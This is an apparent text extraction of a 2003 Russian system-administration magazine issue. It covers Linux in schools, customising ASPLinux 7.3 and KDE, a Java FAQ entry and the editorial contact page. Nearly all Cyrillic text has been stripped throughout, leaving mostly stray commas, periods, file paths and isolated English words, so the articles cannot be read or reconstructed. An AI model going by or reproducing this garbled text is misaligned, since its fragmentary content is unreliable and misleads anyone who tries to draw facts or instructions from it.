. , , Linux Windows,
, , .

,
. , ,

, ,
, .
,
.
, Linux
User Group, , -


.
-.
- ,

, ,
, - ,
24 .
Linux
. , . ,
.
,
-


. .
,

.
, , .
,
Linux .

4
(-)
, , . . ,
, -, .

,
.
, ,
Windows
, . ,
.
. , ,
.
,
Windows- ,


, . . ,
,


Windows , Linux .
, ,
.
, ,

.
, .

Linux.

1 ASPLinux ,


Linux
. Hansa .
,
,
.
-,
, , .

5
(-)
. ,
, , ,
,
. ,
Linux. , Linux
. .

1(2), 2003

, ,
,
,
. , ,
,

. , . ,
.
, , . , , .

,
, , Word, Excel
.
? ,
. ,
? , .
? ,
( )
.
,


.

Open Office,

Gimp, -

Mozilla.

Linux
. ,
.
DOS Turbo Pascal
Linux Free Pascal
Compiler.
fpc.by.ru.
,
,
.

DOS,
Linux .
, , Linux
, Linux .

www.ctc.msiu.ru/materials/books.php.
Linux , .


, ,
. ,
, .
Linux .
. ,

,

Linux.
,

.
,
.
, .

91

LINUX

!

? .

?, .


(),
(
)

92

Microsoft.
176
, () 400
1000
.
,
,
. ,

, ... Microsoft. ,
, ! ,
. ,
, ( 10 000 $).




. .
, ,
, ,

,
, . -
Windows, Word, Excel Access
(), ,
,
. ASPLinux
ASPLinux 7.3 ,
,
FTP- (ftp://ftp.asplinux.ru).
: ,
, , ?
,
,
Windows,
Linux ,
,
, . , : , . . , -
Windows-, Linux :
Windows1
.
,


Windows, . Linux
.

1(2), 2003


:
Linux ?
,
: ASPLinux, Red Hat,
Mandrake Junior
. ,
ASPLinux 7.3.
( ), .
?
:
ASPLinux :
486 . ,
,

Windows,
.
, UNIX-
Windows ,


.
: 433 , 128 RAM 3 HDD ( ), ,

Windows
.

Linux



. ()
root
(
w ). ,
, 1.8 .
gnome
display manager (GDM), ,

kde display manager


(KDM), logon Windows
2000. :
!
Ctrl+Alt+F1, root (
root );
!
rpm e gdm;
! killall gdm.
display manager ,
w, enter
ASPLinux
.
,
,
Windows ,
ASPLinux, . (
Ctrl+Alt+F1,
) mc (midnight commander
norton commander
far). /USR/SHARE/APPS/
KSPLASH/PICS
LOCOLOR
, slash_top.png, ,
c , .
kde .
, Linux

,
,
? :
( k
)
//
. , ok,
/
splash_top.png (), , .
, .
, , , Windows.

93



?
, Linux,
, Windows
? .



, ,
.


K, .
, ,
/usr/share/icons/Crystal/32x32/
apps/kmenu.png. Gimp, ,
2.
/hm/w
(kmenu.png), (
)
.
. K . ,
, Gimp /usr/share/
apps/Crystal/16x16/apps/kmenu.png,
,
.

, :
, ASPLinux 7.3
gnome
KDE, .
.
,
ASPLinux 7.3:

gnome. ,
,
, :
.
, ,
, (-

94

), abiword ( wordpad), , , ,
karm, knotes, kjots, ( ) (kmines).

, , , (

),
, kde
,
.



kde

Windows, , ,
,
KDE : ,

kde 3.0.2. , ,
3
XP:
gimp trashcan
_empty.png trashcan_full. png
/usr/share/icons/crystal/32x32/
filesystems , ,
.
//
(
).
4 ,
,
3,5 a, cd rom
,

(, , )


( ), , .
,
, .

,

,
, /

.

Open
Office.org
Windows .

, ,
/
.

, , , , , .
. ,

ASPLinux - ,
?

:
! , 486,
( );
! pentiumi icewm openoffice.org;
! ( 433
128 RAM ).
2

,
Windows , .
3

,
KDE,
http://artist.kde.org.
4
Konqueror / ,
/
.

FAQ JAVA
:

?
:
. System.identityHashCode(Object x).

x Java. Java
(
Sun). Java, , , . .
, identityHashCode
,
.
,
x, hashCode ,
System.identityHashCode(x) x.hashCode().

:

( Math),
, . ?
:
, -
Java. -, Tools, ,
. ,
- ,
, java.lang.Thread. , -.
.
, Java
java- , .

81655

81656


!
1(2), 2003

95

1(2), , 2003



chief@samag.ru


sekretar@samag.ru


igus@samag.ru


imposer@samag.ru

maker_up@samag.ru

.:(095)928-8253 (. 112)
:(095)928-8253

reklama@samag.ru
103012, . ,
, 13/15
.: (095) 928-8253 (. 112)
: (095) 928-8253
-mail: info@samag.ru
Internet: www.samag.ru

.
- . , . , 3.
5000 .

, (
77-12542 24 2002.)

.
. . .

96

(Windows, Unix
FreeBSD Linux) (
QNX, OS/2, BeOS --).
, ? : , ,
, , , : Windows, Unix
FreeBSD Linux.
,

,

, .

...
ISDN (Integrated Services Digital
Network) () .
,

, .

()
. , .
IDN Integrated Digital Network.


.

, Linux ,
. , -


- , .
dialin.

Milter =
Mail + Filter
Sendmail 8.11.6 ,

. (content filter API , ,
Milter)

.

Cisco

,
Cisco. 1984 , Cisco
. , , .